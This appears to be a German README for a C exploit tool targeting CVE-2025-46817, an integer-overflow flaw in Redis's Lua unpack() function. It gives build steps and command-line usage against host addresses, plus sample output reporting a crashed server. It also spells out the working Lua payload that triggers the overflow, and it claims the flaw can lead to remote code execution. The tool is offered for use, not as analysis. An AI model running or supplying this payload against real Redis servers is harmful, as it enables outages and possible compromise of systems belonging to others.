
C-basierter Exploit für CVE-2025-46817, eine Redis-Integer-Overflow-Schwachstelle, die Crash-Erkennung und potenzielle RCE über Lua-unpack()-Payload ermöglicht.
Eine schlanke C-Implementierung des Exploits für die Redis-Integer-Overflow-Schwachstelle CVE-2025-46817.
sudo apt-get update
sudo apt-get install build-essential libhiredis-dev
sudo yum install gcc hiredis-devel
brew install hiredis
gcc -o exploit exploit.c -lhiredis
./exploit -H 127.0.0.1 -P 6379
./exploit -H 192.168.1.100 -P 6379 -t 5
-H <host> Redis-Server-Host (erforderlich)
-P <port> Redis-Server-Port (erforderlich)
-t <timeout> Verbindungs-Timeout in Sekunden (Standard: 10)
-h Hilfemeldung anzeigen
██▓███ █ █░███▄ █ ▄▄▄▄ █ ██ █████▒ █████▒▓█████ ██▀███
▓██░ ██▒▓█░ █ ░█░██ ▀█ █ ▓█████▄ ██ ▓██▒▓██ ▒▓██ ▒ ▓█ ▀ ▓██ ▒ ██▒
▓██░ ██▓▒▒█░ █ ░█▓██ ▀█ ██▒▒██▒ ▄██▓██ ▒██░▒████ ░▒████ ░ ▒███ ▓██ ░▄█ ▒
▒██▄█▓▒ ▒░█░ █ ░█▓██▒ ▐▌██▒▒██░█▀ ▓▓█ ░██░░▓█▒ ░░▓█▒ ░ ▒▓█ ▄ ▒██▀▀█▄
▒██▒ ░ ░░░██▒██▓▒██░ ▓██░░▓█ ▀█▓▒▒█████▓ ░▒█░ ░▒█░ ░▒████▒░██▓ ▒██▒
▒▓▒░ ░ ░░ ▓░▒ ▒ ░ ▒░ ▒ ▒ ░▒▓███▀▒░▒▓▒ ▒ ▒ ▒ ░ ▒ ░ ░░ ▒░ ░░ ▒▓ ░▒▓░
░▒ ░ ▒ ░ ░ ░ ░░ ░ ▒░▒░▒ ░ ░░▒░ ░ ░ ░ ░ ░ ░ ░ ░▒ ░ ▒░
░░ ░ ░ ░ ░ ░ ░ ░ ░░░ ░ ░ ░ ░ ░ ░ ░ ░░ ░
░ ░ ░ ░ ░ ░ ░
░
CVE-2025-46817 Exploit-Tool
Integer Overflow -> RCE-Kette
Zugriff -> https://pwnbuffer.org/
Autor: Slayerkkk
Ziel: Redis <= 8.2.1
Typ: Speicherkorruption -> Codeausführung
ℹ️ Teste Verbindung zu 127.0.0.1:6379...
✅ Verbindung erfolgreich
ℹ️ Redis-Version: 8.2.1
❌ VERWUNDBAR - Version <= 8.2.1
ℹ️ Teste Lua-Scripting...
✅ Lua aktiviert (1+1=2)
🚀 STARTE AUSNUTZUNG
==================================================
💀 Führe Exploit-Payload aus...
Payload: Integer Overflow via unpack()
💥 SERVER ABGESTÜRZT - Verbindung verloren!
📊 AUSNUTZUNGSERGEBNIS
==============================
💥 Status: abgestürzt (2.34s)
💀 AUSNUTZUNG ERFOLGREICH - Server abgestürzt!
CVE-2025-46817-Schwachstelle bestätigt
Der Exploit zielt auf einen Integer Overflow in der Lua-unpack()-Funktionsimplementierung von Redis (luaB_unpack). Bei Aufruf mit bestimmten Parametern läuft die vorzeichenbehaftete Integer-Arithmetik über, wodurch Redis versucht, eine enorme Anzahl von Rückgabewerten zu materialisieren.
local data = {1, 2, 3}
return {unpack(data, -2147483648, 2147483647)}
Das Tool meldet einen dieser Status:
Autor: Slayerkkk
Website: https://pwnbuffer.org